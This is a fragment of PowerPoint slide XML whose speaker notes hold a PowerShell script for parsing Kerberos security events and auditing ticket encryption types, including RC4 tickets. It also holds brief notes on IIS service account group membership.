                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[9].Value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>                $Event | Add-Member -Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ClientIpAddress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MemberType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NoteProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Value $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[6].Value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>                $Event | Add-Member -Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ServiceName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MemberType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NoteProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Value $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[2].Value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>                $Event | Add-Member -Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TicketOptions</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MemberType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NoteProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Value ([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Kerberos.TicketOptions</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Convert</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ToString</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Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[4].Value, 10))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>                $Event | Add-Member -Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ResultCode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MemberType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NoteProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Value ([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Kerberos.Errors</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Convert</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ToString</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Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[8].Value, 10))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>                $Event | Add-Member -Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TicketEncType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MemberType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NoteProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Value ([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Kerberos.EncryptionTypes</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Convert</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ToString</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Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[5].Value, 10))</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4624</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$Event | Add-Member -Name User -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>MemberType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NoteProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Value ('{0}\{1}' -f $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[6].Value, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[5].Value)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>                $Event | Add-Member -Name Auth -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>MemberType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NoteProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Value $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[9].Value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>                $Event | Add-Member -Name IP -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>MemberType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NoteProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Value $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Event.Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[18].Value</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$Event</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end { }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WinEvent</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FilterHashtable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> @{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>LogName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 'Security'; ID = 4768, 4769 } | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Expand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>-Event | Format-Table ID, User, Auth, IP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TicketEncType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ServiceName</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WinEvent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FilterHashtable</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LogName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 'Security'; ID = 4768, 4769 } | Expand-Event | Group-Object -Property </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TicketEncType</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WinEvent</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FilterHashtable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> @{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>LogName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 'Security'; ID = 4768, 4769 } | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Expand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>-Event | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Where-Object</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TicketEncType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eq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> ARCFOUR_HMAC_MD5 | Format-Table ID, User, Auth, IP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TicketEncType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ServiceName</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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151</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1533961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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2362406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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1072959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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2941181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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1030396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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3781570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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4077307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noProof="0" dirty="0"/>
              <a:t>For</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" noProof="0" dirty="0"/>
              <a:t> authentication the domain name should be used as well </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>(CONTOSO\WEB1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Pre 2008:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" noProof="0" dirty="0"/>
              <a:t> The IIS service should be a member of the local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>IIS Worker Process group (IIS_WPG)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Windows 2008 automatically adds the service account to IIS_IUSR </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3237844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noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
